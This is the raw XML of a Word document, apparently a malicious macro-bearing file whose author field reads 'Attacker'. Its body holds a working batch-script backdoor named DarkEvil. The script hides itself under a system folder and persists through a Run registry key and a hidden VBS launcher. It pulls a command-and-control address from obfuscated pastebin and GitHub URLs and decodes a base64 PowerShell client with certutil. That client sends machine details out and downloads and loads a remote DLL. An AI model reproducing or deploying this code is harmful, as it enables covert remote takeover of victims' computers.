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C4567" w:rsidRPr="009C4567" w:rsidRDefault="009C4567" w:rsidP="009C4567">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@echo off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setlocal enabledelayedexpansion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set arg=%1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if defined arg goto %arg%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set current_path=%cd%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set workdir_path=%systemdrive%\Dark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set batFile=%systemdrive%\Dark\DarkClient.bat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if exist "%batFile%" (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ab/>
        <w:t>call :FoundTitle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ab/>
        <w:t>if "!foundT!" == "cmd.exe" (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ab/>
      </w:r>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>copy /y %0 "%batFile%" &gt;nul 2&gt;&amp;1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ab/>
      </w:r>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>del /q "%workdir_path%\psh_client.ps1" &gt;nul 2&gt;&amp;1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ab/>
      </w:r>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>exit /b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ab/>
        <w:t>) else (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ab/>
      </w:r>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>call :Run_Code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ab/>
      </w:r>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>exit /b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ab/>
        <w:t>)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) else (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ab/>
        <w:t>mkdir "%workdir_path%" &gt;nul 2&gt;&amp;1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ab/>
        <w:t>attrib +s +h +a "%workdir_path%" &gt;nul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ab/>
        <w:t>copy /y %0 "%batFile%" &gt;nul 2&gt;&amp;1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ab/>
        <w:t>call :create_vbs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ab/>
        <w:t>call :startVbs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ab/>
        <w:t>call :Registry_Entery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ab/>
        <w:t>exit /b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)</w:t>
      </w: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:create_vbs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Set objShell = WScript.CreateObject^("WScript.Shell"^) &gt;&gt;"%workdir_path%\start_DarkEvil.vbs"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objShell.Run ^("cmd /c %batFile%"^),0 &gt;&gt;"%workdir_path%\start_DarkEvil.vbs"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exit /b</w:t>
      </w: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:FoundTitle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set foundT=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for /F "tokens=1" %%A in ('tasklist /FI "WINDOWTITLE eq DarkEvil"') do set foundT=%%A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exit /b</w:t>
      </w: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:startVbs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%workdir_path%\start_DarkEvil.vbs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exit /b</w:t>
      </w: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:Registry_Entery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reg add hkcu\software\microsoft\windows\currentversion\run /v DarkEvil /t reg_sz /d "%systemdrive%\Dark\start_DarkEvil.vbs" /f &gt;nul 2&gt;&amp;1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exit /b</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>:Run_Code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call :create_encode_psh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call :create_wget_js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start /b call %batFile% Main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:loop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echo.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[+] Wating For 15 minutes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ping localhost -n 3600 &gt;nul 2&gt;&amp;1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 xml:space="preserve">taskkill /im po^we^rs^he^ll.^e^x^e /f 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goto loop</w:t>
      </w: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:Main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title DarkEvil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set /A count=0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:count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set GetContent=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set Main_url=ht^t^ps://pa^ste^bi^n.c^o^m/r^aw/L^L^8AG5^yQ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set Backup_url=h^tt^ps://ra^w.git^hu^buser^cont^ent^.com/De^vil^Bo^t00^0/Cl^ie^nt_IP_PO^RT/m^ain/I^P_PO^R^T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if not exist "%workdir_path%\psh_client.ps1" call :create_encode_psh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if not exist "%workdir_path%\wget.js" call :create_wget_js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if not exist "%workdir_path%\wget.js" (if exist "%windir%\system32\curl.exe" set GetContent=%windir%\system32\curl.exe --silent) else (set GetContent=cscript /nologo %workdir_path%\wget.js)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rem Get url content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set URL=%Main_url%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if %count% geq 5 set URL=%Backup_url%&amp; set /A count=0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lastRenderedPageBreak/>
        <w:t>set host=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set port=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[+] Get content From Url %URL%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set GetContent= %GetContent% %URL%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for /F "tokens=1,2 delims=:" %%A in ('%GetContent%') do (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set host=%%A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 xml:space="preserve">set port=%%B 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)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if not defined host ping localhost -n 60 &amp; goto Main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if not defined port ping localhost -n 60 &amp; goto Main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set run_command=p^owe^rs^h^ell -e^xec b^ypa^s^s %workdir_path%\ps^h_c^li^en^t.p^s^1 %host% %port%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%run_command%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del /q "%temp%\*.dll" &gt;nul 2&gt;&amp;1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set /A count+=1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ping localhost -n 10 &gt;nul 2&gt;&amp;1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goto count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exit /b</w:t>
      </w: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:create_encode_psh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if exist "%temp%\Encode_Data.txt" del "%temp%\Encode_Data.txt" &gt;nul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cGFyYW0oCiAgICBbc3RyaW5nXSRpcCwKICAgIFtzdHJpbmddJHBvcnQKKQoKCnRy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eSB7Cgkkc29ja2V0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVGNw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Q2xpZW50KCRpcCwgJHBvcnQpCn0KY2F0Y2ggewoJYnJlYWsKCn0KJGNvbXB1dGVy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lastRenderedPageBreak/>
        <w:t>echo bmFtZSA9ICRlbnY6Q09NUFVURVJOQU1FCgokcHJvY2Vzc0FyY2ggPSAiIgoKJGFy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Y2hpdGVjdHVyZSA9ICRlbnY6UFJPQ0VTU09SX0FSQ0hJVEVDVFVSRQppZiAoJGFy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Y2hpdGVjdHVyZSAtZXEgIkFNRDY0IikgewoJJHByb2Nlc3NBcmNoID0gIng2NC1i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aXQiCn0gZWxzZWlmICgkYXJjaGl0ZWN0dXJlIC1lcSAieDg2IikgewoJJHByb2Nl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c3NBcmNoID0gIngzMi1iaXQiCn0gZWxzZSB7Cn0KCgokb3NuYW1lID0gKEdldC1X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bWlPYmplY3QgLUNsYXNzIFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbgok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Y2xpZW50X3R5cGUgPSAiUG93ZXJzaGVsbCIKJG1hY2hpbmVfaW5mbyA9ICRjb21w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dXRlcm5hbWUgKyAiOiIgKyAkcHJvY2Vzc0FyY2ggKyAiOiIgKyAkb3NuYW1lICsg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IjoiICsgJGNsaWVudF90eXBlCiRzZW5kX21hY2hpbmVfaW5mbyA9IFtTeXN0ZW0u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VGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldEJ5dGVzKCRtYWNoaW5lX2luZm8pCiRz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b2NrZXQuR2V0U3RyZWFtKCkuV3JpdGUoJHNlbmRfbWFjaGluZV9pbmZvLCAwLCAk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c2VuZF9tYWNoaW5lX2luZm8uTGVuZ3RoKQokYnVmZmVyID0gTmV3LU9iamVjdCBi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eXRlW10gNDA5NgokcmFuZG9tTnVtYmVyID0gR2V0LVJhbmRvbSAtTWluaW11bSAx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IC1NYXhpbXVtIDEwMDAKJGd1aWQgPSBbZ3VpZF06Ok5ld0d1aWQoKS5Ub1N0cmlu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ZygpCiRmaWxlTmFtZSA9ICJkb3dubG9hZF8ke3JhbmRvbU51bWJlcn1fJHtndWlk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fS5kbGwiCiR0ZW1wRm9sZGVyID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBh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dGgoKQokZmlsZVN0cmVhbSA9IFtTeXN0ZW0uSU8uRmlsZV06OkNyZWF0ZSgiJHRl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lastRenderedPageBreak/>
        <w:t>echo bXBGb2xkZXJcJGZpbGVOYW1lIikKJHJlY2VpdmVkQnl0ZXMgPSAkc29ja2V0Lkdl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dFN0cmVhbSgpLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpCiRyZXNw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b25zZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygk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YnVmZmVyLCAwLCAkcmVjZWl2ZWRCeXRlcykKJGZpbGVTaXplID0gW1N5c3RlbS5J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bnQzMl06OlBhcnNlKCRyZXNwb25zZSkKJG1zZyA9ICJzZW5kX2RsbCIKJHNlbmRt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c2cgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRCeXRlcygkbXNn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KQokc29ja2V0LkdldFN0cmVhbSgpLldyaXRlKCRzZW5kbXNnLCAwLCAkc2VuZG1z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Zy5MZW5ndGgpCiR0b3RhbEJ5dGVzID0gMAp3aGlsZSAoJHRvdGFsQnl0ZXMgLWx0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ICRmaWxlU2l6ZSkgewogICAgdHJ5IHsKICAgICAgICAKICAgICAgICAkYnl0ZXNS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ZWFkID0gJHNvY2tldC5HZXRTdHJlYW0oKS5SZWFkKCRidWZmZXIsIDAsICRidWZm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ZXIuTGVuZ3RoKQoKICAgICAgICBpZiAoJGJ5dGVzUmVhZCAtZ3QgMCkgewogICAg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ICAgICAgICAKICAgICAgICAgICAgJGZpbGVTdHJlYW0uV3JpdGUoJGJ1ZmZlciwg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MCwgJGJ5dGVzUmVhZCkKICAgICAgICAgICAgJGZpbGVTdHJlYW0uRmx1c2goKQoK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ICAgICAgICAgICAgJHRvdGFsQnl0ZXMgKz0gJGJ5dGVzUmVhZAoKICAgICAgICAg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ICAgaWYgKCR0b3RhbEJ5dGVzIC1nZSAkZmlsZVNpemUpIHsKICAgICAgICAgICAg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ICAgIGJyZWFrCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9CiAgICBjYXRj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aCB7CiAgICAgICAgYnJlYWsKICAgIH0KfQoKJGZpbGVTdHJlYW0uQ2xvc2UoKQok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lastRenderedPageBreak/>
        <w:t>echo ZnVsbFBhdGggPSBKb2luLVBhdGggJHRlbXBGb2xkZXIgJGZpbGVOYW1lCiROZXdw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YXRoID0gJGZ1bGxQYXRoLlJlcGxhY2UoIlwiLCAiXFwiKQokc2lnbmF0dXJlID0g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QCIKW0RsbEltcG9ydCgiJE5ld3BhdGgiLCBFbnRyeVBvaW50PSJEYXJrRXZpbCIp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XQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgRGFya0V2aWwoSW50UHRyIHNvY2tl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dCk7CiJACiRMb2FkRExMID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJHNp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Z25hdHVyZSAtTmFtZSAiTG9hZERMTCIgLU5hbWVzcGFjZSAiTG9hZERMTCIgLVBh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c3NUaHJ1CiRoYW5kbGUgPSAkc29ja2V0LkNsaWVudC5IYW5kbGUKJExvYWRETEw6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OkRhcmtFdmlsKCRoYW5kbGUpCldyaXRlLUhvc3QgJGZ1bGxQYXRo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if exist "%workdir_path%\psh_client.ps1" del "%workdir_path%\psh_client.ps1" &gt;nul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certutil -decode "%temp%\Encode_Data.txt" "%workdir_path%\psh_client.ps1" &gt;nul 2&gt;&amp;1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if exist "%temp%\Encode_Data.txt" del "%temp%\Encode_Data.txt" &gt;nul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exit /b</w:t>
      </w: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:create_wget_js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if exist "%temp%\Encode_Data.txt" del "%temp%\Encode_Data.txt" &gt;nul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dmFyIFdpbkh0dHBSZXEgPSBuZXcgQWN0aXZlWE9iamVjdCgiV2luSHR0cC5XaW5I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dHRwUmVxdWVzdC41LjEiKTsNCldpbkh0dHBSZXEuT3BlbigiR0VUIiwgV1Njcmlw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echo dC5Bcmd1bWVudHMoMCksIC8qYXN5bmM9Ki9mYWxzZSk7DQpXaW5IdHRwUmVxLlNl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lastRenderedPageBreak/>
        <w:t>echo bmQoKTsNCldTY3JpcHQuRWNobyhXaW5IdHRwUmVxLlJlc3BvbnNlVGV4dCk7 &gt;&gt;"%temp%\Encode_Data.txt"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if exist "%workdir_path%\wget.js" del "%workdir_path%\wget.js" &gt;nul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certutil -decode "%temp%\Encode_Data.txt" "%workdir_path%\wget.js" &gt;nul 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4567" w:rsidRPr="009C4567" w:rsidRDefault="009C4567" w:rsidP="009C4567">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if exist "%temp%\Encode_Data.txt" del "%temp%\Encode_Data.txt" &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF4758" w:rsidRPr="009C4567" w:rsidRDefault="009C4567" w:rsidP="009C4567">
      <w:r w:rsidRPr="009C4567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit /b</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AF4758" w:rsidRPr="009C456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6FDD"/>
    <w:rsid w:val="00646C09"/>
    <w:rsid w:val="00876FDD"/>
    <w:rsid w:val="009C4567"/>
    <w:rsid w:val="00AF4758"/>
    <w:rsid w:val="00ED3F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  <wne:mcd wne:macroName="PROJECT.NEWMACROS.WRITEANDDECODEBASE64STRINGX32" wne:name="Project.NewMacros.WriteAndDecodeBase64Stringx32" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.WRITEANDDECODEBASE64STRINGX64" wne:name="Project.NewMacros.WriteAndDecodeBase64Stringx64" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.EXECUTECOMMANDX32" wne:name="Project.NewMacros.ExecuteCommandX32" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.EXECUTECOMMANDX64" wne:name="Project.NewMacros.ExecuteCommandX64" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.CALLDLLX32" wne:name="Project.NewMacros.CallDLLX32" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.CALLDLLX64" wne:name="Project.NewMacros.CallDLLX6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8</Pages>
  <Words>1169</Words>
  <Characters>6668</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7822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Attacker</dc:creator>
  <cp:lastModifiedBy>Attacker</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-22T15:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-22T15:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>